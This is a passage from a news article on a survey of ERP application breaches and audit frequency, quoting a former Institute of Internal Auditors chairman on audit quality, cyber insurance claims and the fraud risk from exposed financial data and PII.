The high volume of breaches is also somewhat at odds with another finding: that 78% of respondents audit their ERP apps every 90 days or more.
Larry Harrington, former chairman of the Global Board of the Institute of Internal Auditors (IIA), said the findings should raise questions at a board level about the quality of such audits.
“The lack of these controls is one way for cyber insurance companies to deny claims,” he warned “The information compromised most often according to this research is the highest regulated in today’s business ecosystem. Most concerning is the popularity of sales, financial data and PII, all of which should raise flags about the possibility of insider trading, collusion and fraud.”